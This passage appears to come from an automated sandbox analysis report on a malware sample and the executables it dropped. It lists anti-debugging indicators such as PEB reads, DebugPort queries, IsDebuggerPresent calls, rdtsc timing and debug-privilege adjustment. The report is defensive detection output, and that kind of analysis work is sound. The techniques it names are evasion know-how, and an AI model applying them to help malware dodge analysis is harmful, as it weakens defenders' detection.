Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4838A4 mov eax, dword ptr fs:[00000030h] 24_2_6B4838A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4838A4 mov ecx, dword ptr fs:[00000030h] 24_2_6B4838A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47A745 mov eax, dword ptr fs:[00000030h] 24_2_6B47A745
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADF4C mov eax, dword ptr fs:[00000030h] 24_2_6B4ADF4C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACF6A mov eax, dword ptr fs:[00000030h] 24_2_6B4ACF6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACF6A mov eax, dword ptr fs:[00000030h] 24_2_6B4ACF6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476F60 mov eax, dword ptr fs:[00000030h] 24_2_6B476F60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476F60 mov eax, dword ptr fs:[00000030h] 24_2_6B476F60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E760 mov eax, dword ptr fs:[00000030h] 24_2_6B49E760
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E760 mov eax, dword ptr fs:[00000030h] 24_2_6B49E760
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548F6A mov eax, dword ptr fs:[00000030h] 24_2_6B548F6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B50FF10 mov eax, dword ptr fs:[00000030h] 24_2_6B50FF10
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B50FF10 mov eax, dword ptr fs:[00000030h] 24_2_6B50FF10
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC707 mov eax, dword ptr fs:[00000030h] 24_2_6B4AC707
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC707 mov ecx, dword ptr fs:[00000030h] 24_2_6B4AC707
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC707 mov eax, dword ptr fs:[00000030h] 24_2_6B4AC707
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52DF1D mov ecx, dword ptr fs:[00000030h] 24_2_6B52DF1D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52DF1D mov eax, dword ptr fs:[00000030h] 24_2_6B52DF1D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4710 mov eax, dword ptr fs:[00000030h] 24_2_6B4A4710
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49F716 mov eax, dword ptr fs:[00000030h] 24_2_6B49F716
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474F2E mov eax, dword ptr fs:[00000030h] 24_2_6B474F2E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474F2E mov eax, dword ptr fs:[00000030h] 24_2_6B474F2E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B73D mov eax, dword ptr fs:[00000030h] 24_2_6B49B73D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B73D mov eax, dword ptr fs:[00000030h] 24_2_6B49B73D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476730 mov eax, dword ptr fs:[00000030h] 24_2_6B476730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476730 mov eax, dword ptr fs:[00000030h] 24_2_6B476730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476730 mov eax, dword ptr fs:[00000030h] 24_2_6B476730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE730 mov eax, dword ptr fs:[00000030h] 24_2_6B4AE730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD7CA mov eax, dword ptr fs:[00000030h] 24_2_6B4AD7CA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD7CA mov eax, dword ptr fs:[00000030h] 24_2_6B4AD7CA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473FC5 mov eax, dword ptr fs:[00000030h] 24_2_6B473FC5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473FC5 mov eax, dword ptr fs:[00000030h] 24_2_6B473FC5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473FC5 mov eax, dword ptr fs:[00000030h] 24_2_6B473FC5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h] 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B37F5 mov eax, dword ptr fs:[00000030h] 24_2_6B4B37F5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov ecx, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h] 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506652 mov eax, dword ptr fs:[00000030h] 24_2_6B506652
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48766D mov eax, dword ptr fs:[00000030h] 24_2_6B48766D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACE6C mov eax, dword ptr fs:[00000030h] 24_2_6B4ACE6C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACE6C mov ecx, dword ptr fs:[00000030h] 24_2_6B4ACE6C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52F674 mov eax, dword ptr fs:[00000030h] 24_2_6B52F674
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h] 24_2_6B4FAE60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h] 24_2_6B4FAE60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h] 24_2_6B4FAE60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h] 24_2_6B4FAE60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3E70 mov eax, dword ptr fs:[00000030h] 24_2_6B4A3E70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B502E14 mov eax, dword ptr fs:[00000030h] 24_2_6B502E14
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47C600 mov eax, dword ptr fs:[00000030h] 24_2_6B47C600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47C600 mov eax, dword ptr fs:[00000030h] 24_2_6B47C600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47C600 mov eax, dword ptr fs:[00000030h] 24_2_6B47C600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0E21 mov eax, dword ptr fs:[00000030h] 24_2_6B4B0E21
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h] 24_2_6B4F5623
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FE3F mov eax, dword ptr fs:[00000030h] 24_2_6B52FE3F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC63D mov eax, dword ptr fs:[00000030h] 24_2_6B4AC63D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47A63B mov eax, dword ptr fs:[00000030h] 24_2_6B47A63B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47A63B mov eax, dword ptr fs:[00000030h] 24_2_6B47A63B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ED6 mov eax, dword ptr fs:[00000030h] 24_2_6B548ED6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A36CC mov eax, dword ptr fs:[00000030h] 24_2_6B4A36CC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A16E0 mov ecx, dword ptr fs:[00000030h] 24_2_6B4A16E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4876E2 mov eax, dword ptr fs:[00000030h] 24_2_6B4876E2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B3EE4 mov eax, dword ptr fs:[00000030h] 24_2_6B4B3EE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B3EE4 mov eax, dword ptr fs:[00000030h] 24_2_6B4B3EE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B3EE4 mov eax, dword ptr fs:[00000030h] 24_2_6B4B3EE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473E80 mov eax, dword ptr fs:[00000030h] 24_2_6B473E80
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473E80 mov eax, dword ptr fs:[00000030h] 24_2_6B473E80
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADE9E mov eax, dword ptr fs:[00000030h] 24_2_6B4ADE9E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADE9E mov eax, dword ptr fs:[00000030h] 24_2_6B4ADE9E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADE9E mov eax, dword ptr fs:[00000030h] 24_2_6B4ADE9E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F46A7 mov eax, dword ptr fs:[00000030h] 24_2_6B4F46A7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B502EA3 mov eax, dword ptr fs:[00000030h] 24_2_6B502EA3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B3D43 mov eax, dword ptr fs:[00000030h] 24_2_6B4B3D43
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47354C mov eax, dword ptr fs:[00000030h] 24_2_6B47354C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47354C mov eax, dword ptr fs:[00000030h] 24_2_6B47354C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B523D40 mov eax, dword ptr fs:[00000030h] 24_2_6B523D40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B528D47 mov eax, dword ptr fs:[00000030h] 24_2_6B528D47
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B497D50 mov eax, dword ptr fs:[00000030h] 24_2_6B497D50
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49C577 mov eax, dword ptr fs:[00000030h] 24_2_6B49C577
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49C577 mov eax, dword ptr fs:[00000030h] 24_2_6B49C577
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B533518 mov eax, dword ptr fs:[00000030h] 24_2_6B533518
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B533518 mov eax, dword ptr fs:[00000030h] 24_2_6B533518
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B533518 mov eax, dword ptr fs:[00000030h] 24_2_6B533518
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F51D mov eax, dword ptr fs:[00000030h] 24_2_6B47F51D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548D34 mov eax, dword ptr fs:[00000030h] 24_2_6B548D34
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h] 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h] 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h] 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h] 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h] 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4D3B mov eax, dword ptr fs:[00000030h] 24_2_6B4A4D3B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4D3B mov eax, dword ptr fs:[00000030h] 24_2_6B4A4D3B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4D3B mov eax, dword ptr fs:[00000030h] 24_2_6B4A4D3B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47AD30 mov eax, dword ptr fs:[00000030h] 24_2_6B47AD30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FDD3 mov eax, dword ptr fs:[00000030h] 24_2_6B52FDD3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4715C1 mov eax, dword ptr fs:[00000030h] 24_2_6B4715C1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B528DF1 mov eax, dword ptr fs:[00000030h] 24_2_6B528DF1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A95EC mov eax, dword ptr fs:[00000030h] 24_2_6B4A95EC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4795F0 mov eax, dword ptr fs:[00000030h] 24_2_6B4795F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4795F0 mov ecx, dword ptr fs:[00000030h] 24_2_6B4795F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53B581 mov eax, dword ptr fs:[00000030h] 24_2_6B53B581
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473591 mov eax, dword ptr fs:[00000030h] 24_2_6B473591
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A35A1 mov eax, dword ptr fs:[00000030h] 24_2_6B4A35A1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1DB5 mov eax, dword ptr fs:[00000030h] 24_2_6B4A1DB5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548450 mov eax, dword ptr fs:[00000030h] 24_2_6B548450
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548C75 mov eax, dword ptr fs:[00000030h] 24_2_6B548C75
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49746D mov eax, dword ptr fs:[00000030h] 24_2_6B49746D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h] 24_2_6B4AAC7B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B5C70 mov eax, dword ptr fs:[00000030h] 24_2_6B4B5C70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48FC77 mov eax, dword ptr fs:[00000030h] 24_2_6B48FC77
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548C14 mov eax, dword ptr fs:[00000030h] 24_2_6B548C14
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48FC01 mov eax, dword ptr fs:[00000030h] 24_2_6B48FC01
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h] 24_2_6B531C06
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54740D mov eax, dword ptr fs:[00000030h] 24_2_6B54740D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ABC2C mov eax, dword ptr fs:[00000030h] 24_2_6B4ABC2C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492430 mov eax, dword ptr fs:[00000030h] 24_2_6B492430
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474439 mov eax, dword ptr fs:[00000030h] 24_2_6B474439
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548CD6 mov eax, dword ptr fs:[00000030h] 24_2_6B548CD6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACCC0 mov eax, dword ptr fs:[00000030h] 24_2_6B4ACCC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472CDB mov eax, dword ptr fs:[00000030h] 24_2_6B472CDB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5314FB mov eax, dword ptr fs:[00000030h] 24_2_6B5314FB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52D4E1 mov eax, dword ptr fs:[00000030h] 24_2_6B52D4E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h] 24_2_6B534496
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471480 mov eax, dword ptr fs:[00000030h] 24_2_6B471480
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47649B mov eax, dword ptr fs:[00000030h] 24_2_6B47649B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B mov eax, dword ptr fs:[00000030h] 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549CB3 mov eax, dword ptr fs:[00000030h] 24_2_6B549CB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474CB0 mov eax, dword ptr fs:[00000030h] 24_2_6B474CB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD4B0 mov eax, dword ptr fs:[00000030h] 24_2_6B4AD4B0
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B60D90 mov eax, dword ptr fs:[00000030h] 33_2_02B60D90
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B6092B mov eax, dword ptr fs:[00000030h] 33_2_02B6092B
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00416842 mov eax, dword ptr fs:[00000030h] 34_2_00416842
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00412AB1 mov eax, dword ptr fs:[00000030h] 34_2_00412AB1
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8615.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B084.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00420900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420900
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree, 34_2_00401F20
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A6B90 rdtsc 24_2_6B4A6B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B99A0 ZwCreateSection,LdrInitializeThunk, 24_2_6B4B99A0
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00420900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420900
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_0041D190 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D190
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0041CC60
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_004203D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_004203D0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410E58 SetUnhandledExceptionFilter, 34_2_00410E58
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_004110A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_004110A3
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00415393 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00415393
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410CF3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00410CF3

HIPS / PFW / Operating System Protection Evasion:

